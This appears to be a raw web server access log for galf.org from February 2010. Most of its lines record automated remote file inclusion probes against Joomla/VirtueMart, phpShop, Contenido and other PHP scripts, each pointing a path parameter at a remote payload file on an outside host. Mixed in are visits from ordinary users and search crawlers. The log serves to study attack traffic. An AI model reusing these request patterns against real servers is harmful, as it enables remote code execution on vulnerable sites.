208.82.115.69 - - [14/Feb/2010:19:46:28 -0800] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.82.115.69 - - [14/Feb/2010:19:46:28 -0800] "GET /logs/access_091207.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.100.181.217 - - [14/Feb/2010:19:46:55 -0800] "GET /logs/access_091012.log%20/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.100.181.217 - - [14/Feb/2010:19:46:56 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
61.100.181.217 - - [14/Feb/2010:19:47:16 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
200.93.147.154 - - [14/Feb/2010:19:48:01 -0800] "GET /logs/access_090928.log/?SERVER_[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.82.115.69 - - [14/Feb/2010:19:49:33 -0800] "GET /logs/access_091130.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:50:03 -0800] "GET / HTTP/1.1" 200 1048 "http://www.carlaantonelli.com/links_gays.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:12 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:12 -0800] "GET /logs/access_090831.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:12 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:18 -0800] "GET /logs/access_091207.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:51:47 -0800] "GET /logs/access_090817.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.111.3.35 - - [14/Feb/2010:19:51:52 -0800] "GET /logs/access_100125.log/?sourcedir=http://tkosin.onmam.com/data/doc.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:52 -0800] "GET /logs/access_100125.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:52 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:52 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:19:51:53 -0800] "GET /logs/access_100111.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:52:07 -0800] "GET /logs/access_091221.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:02 -0800] "GET /?M=A HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:54:03 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:54:03 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:54:07 -0800] "GET /logs/access_100201.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:09 -0800] "GET /?S=A HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:09 -0800] "GET /?N=D HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:09 -0800] "GET /?D=A HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:10 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:11 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:11 -0800] "GET /labia/ HTTP/1.1" 200 524 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:11 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
121.127.202.43 - - [14/Feb/2010:19:54:11 -0800] "GET /logs/ HTTP/1.1" 200 4942 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
208.82.115.69 - - [14/Feb/2010:19:54:55 -0800] "GET /logs/access_091207.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
77.225.42.178 - - [14/Feb/2010:19:55:09 -0800] "GET /logs/access_100125.log/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:19:55:24 -0800] "GET /logs/access_100125.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.28 - - [14/Feb/2010:19:56:02 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=47&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iebar; FunWebProducts)" "www.galf.org"
208.82.115.69 - - [14/Feb/2010:19:56:08 -0800] "GET /logs/access_091130.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://files.sign.io/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:00:16 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:00:16 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:00:16 -0800] "GET /logs/access_090803.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:00:24 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:00:24 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:00:25 -0800] "GET /logs/access_090817.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:20:00:28 -0800] "GET /logs/access_091012.log%20/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:20:00:28 -0800] "GET /logs/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:20:00:28 -0800] "GET /components/com_virtuemart/export.php?mosConfig.absolute.path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
62.67.235.148 - - [14/Feb/2010:20:01:54 -0800] "GET /logs/access.log///write_comment_update.php?board_skin_path=http://kcs.sc.kr/data/member/idanyar.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:02:37 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:02:37 -0800] "GET /logs/access_090907.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:02:37 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:02:55 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:02:55 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:02:55 -0800] "GET /logs/access_090907.log%20%20//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:04:06 -0800] "GET /logs//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:04:06 -0800] "GET /logs/access_090914.log//components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.179.6 - - [14/Feb/2010:20:04:06 -0800] "GET /components/com_phpshop/show_image_in_imgtag.php?mosConfig_absolute_path=http://bk.knu.ac.kr/include/includes/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:05:00 -0800] "GET /logs/access_090817.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:06:04 -0800] "GET /logs/access_100125.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:08:55 -0800] "GET /logs/access_100118.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:08:55 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:08:55 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:08:58 -0800] "GET /cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:08:58 -0800] "GET /logs/access_100118.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:08:58 -0800] "GET /logs/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:09:21 -0800] "GET /logs/access_090817.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:09:35 -0800] "GET /logs/access_100111.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [14/Feb/2010:20:09:46 -0800] "GET /logs/access_100111.log/cowadmin/cowedit/cowedit/class.cowedit.php?ToDo=InsertFunction&DEP=http://graduate.pknu.ac.kr/board/img/news/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:09:59 -0800] "GET /logs/access_100125.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.209 - - [14/Feb/2010:20:11:27 -0800] "GET /logs/ HTTP/1.1" 200 4942 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:12:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:12:56 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:12:56 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:13:02 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:13:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:13:03 -0800] "GET /logs/access_100111.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:15:11 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.144 - - [14/Feb/2010:20:15:12 -0800] "GET /logs/access_091109.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
204.213.93.197 - - [14/Feb/2010:20:17:34 -0800] "GET /logs/access_100111.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:19:16 -0800] "GET /logs/access_090810.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:19:16 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:19:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.80.193.34 - - [14/Feb/2010:20:20:59 -0800] "GET /labia23portugues/index.htm&sa=x&oi=translate&resnum=45&ct=result HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 3.0; HbTools 4.8.4)" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:23:16 -0800] "GET /logs/access_090817.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:23:16 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:23:16 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.108 - - [14/Feb/2010:20:25:29 -0800] "GET /logs/access_090824.log HTTP/1.1" 200 131072 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
88.131.106.32 - - [14/Feb/2010:20:26:09 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
88.131.106.32 - - [14/Feb/2010:20:26:11 -0800] "GET /logs/?D=A HTTP/1.0" 200 4926 "-" "Speedy Spider (http://www.entireweb.com/about/search_tech/speedy_spider/)" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:31:08 -0800] "GET /logs/access_091221.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:31:20 -0800] "GET /logs/access_091207.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:27 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:27 -0800] "GET /index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:27 -0800] "GET /logs/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:34 -0800] "GET /logs/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:34 -0800] "GET /index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:34 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:35 -0800] "GET /index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:35 -0800] "GET /logs/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:31:35 -0800] "GET /logs/access_090914.log%20%20/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:34:16 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:34:26 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:35:15 -0800] "GET /logs/access_091026.log%20%20/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:35:17 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
95.108.150.235 - - [14/Feb/2010:20:38:17 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [14/Feb/2010:20:38:18 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [14/Feb/2010:20:38:22 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [14/Feb/2010:20:38:23 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
95.108.150.235 - - [14/Feb/2010:20:38:24 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "www.galf.org"
95.108.150.235 - - [14/Feb/2010:20:38:25 -0800] "GET / HTTP/1.1" 200 1048 "-" "Yandex/1.01.001 (compatible; Win16; H)" "galf.org"
64.202.102.218 - - [14/Feb/2010:20:43:00 -0800] "GET /logs/access_090914.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:43:11 -0800] "GET /logs/access_090914.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:43:26 -0800] "GET /logs/access_090914.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:43:40 -0800] "GET /logs/access_091026.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:43:54 -0800] "GET /logs/access_091026.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.202.102.218 - - [14/Feb/2010:20:44:11 -0800] "GET /logs/access_091026.log/index.php?body=http://www.diamondhitech.com/bbs/icon/private_icon/com/sc1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.112.126.5 - - [14/Feb/2010:20:47:23 -0800] "GET /logs/access_100125.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:48:13 -0800] "GET /logs/access_100118.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:48:13 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [14/Feb/2010:20:48:13 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.waytochristmission.com//gbbs/data/asu/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
